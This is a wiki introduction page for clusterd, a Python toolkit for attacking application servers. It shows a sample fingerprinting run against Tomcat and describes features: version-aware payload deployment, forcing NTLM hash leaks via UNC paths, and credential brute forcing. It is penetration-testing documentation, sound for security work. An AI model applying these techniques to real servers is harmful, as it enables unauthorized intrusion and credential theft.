Skip to content

Introduction

Jump to bottom
bryan alexander edited this page Apr 16, 2014 · 4 revisions

clusterd is an application server attack toolkit written in Python. Currently supporting four different application servers, clusterd is capable of version-aware exploitation and reconnaissance using robust and reliable techniques.

The core issue this tool was born from is a lack of context during the exploitation phases. It is well known to penetration testers and security consultants alike that the current set of tools aren't very reliable. This is primarily due to a lack of context; JBoss version 5.1 is very different from 7.1. It's these differences that require us to first inspect the context of our application server and to then move forward with this information into the exploitation phases.

clusterd's first goal when executed is to fingerprint the remote system. This establishes the identity of the remote server and platform in order to determine the most accurate deployer and/or vulnerabilities to launch. A standard clusterd execution would look something like:

$ ./clusterd.py -i 192.168.1.102 -a tomcat

            clusterd/0.1 - clustered attack toolkit
	  Supporting jboss, coldfusion, weblogic, tomcat

 [2014-02-08 12:50AM] Started at 2014-02-08 12:50AM
 [2014-02-08 12:50AM] Servers' OS hinted at windows
 [2014-02-08 12:50AM] Fingerprinting host '192.168.1.102'
 [2014-02-08 12:50AM] Server hinted at 'tomcat'
 [2014-02-08 12:50AM] Checking tomcat version 3.3 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 3.3 Tomcat Admin...
 [2014-02-08 12:50AM] Checking tomcat version 4.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 4.1 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 4.1 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 4.0 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 5.5 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 5.5 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 6.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 6.0 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 7.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 7.0 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 8.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 8.0 Tomcat Manager...
 [2014-02-08 12:50AM] Matched 2 fingerprints for service tomcat
 [2014-02-08 12:50AM] 	Tomcat (version 5.5)
 [2014-02-08 12:50AM] 	Tomcat Manager (version 5.5)
 [2014-02-08 12:50AM] Fingerprinting completed.
 [2014-02-08 12:50AM] Finished at 2014-02-08 12:50AM

As shown, clusterd will iterate over all fingerprints for the selected platform and provide the results. If other flags were specified, then these would've been passed off for further processing. clusterd aims to be highly configurable in its fingerprinting and interactions with the remote system.

You can find a brief video walkthrough of clusterd against a Tomcat server over at Youtube, courtesy of awhitehttr.

Unique Features

clusterd is unique in many ways, not only in its approach to server exploitation, but in some of its core features. A brief rundown of some of these features is below:

  • The only framework aware of a platform's version

    clusterd's core is built around recon and exploitation of platforms based upon the discovered version. This version then can be used to deploy payloads or execute auxiliary modules. JBoss, for example, was particularly difficult to deploy to because it was never clear which deployment method worked with which version. clusterd has exhaustively been tested against many minor/major versions of JBoss, ensuring stability and dependability with version-specific deployments.

  • JBoss 7.x deployments

    Currently, no other tool is capable of deploying WAR's to JBoss 7.x and up. This is because gone are the days of jmx-console's and exposed JMXInvokerServlets. 7.x uses a new HTTP API using JSON messaging. Deploying to this is still possible, and admittedly easier and more stable than before, but this interface will always require authentication. No default credentials are enabled.

  • SMB hash retrieval

    clusterd features a unique methodology for forcing remote application servers to emit their encrypted NTLM hash. This is performed by submitting an installation of a WAR containing a UNC path, which the server will then attempt to retrieve. Because of the way in which Windows connects to remote shares/UNC paths, it will automatically attempt to negotiate an SMB connection, divulging its encrypted NTLM hash. We use the standard nonce, 1122334455667788, to ease cracking of the hash.

  • Password brute forcing

    Many services, such as WebLogic, don't use basic HTTP auth, thereby eliminating the use of HTTP authentication brute forcers, such as Hydra or Medusa. clusterd is fully capable of brute forcing authentication for all supported platforms using a provided wordlist and username. Also included are many default credentials for these platforms, so clusterd may even be able to guess credentials without you even knowing.

  • Support for exotic application servers

    Because of clusterd's architecture, it's fairly trivial to add support for other servers. clusterd currently supports Railo and Weblogic, two servers not supported in any other tool. More servers (see TODO) will be added in time.

Clone this wiki locally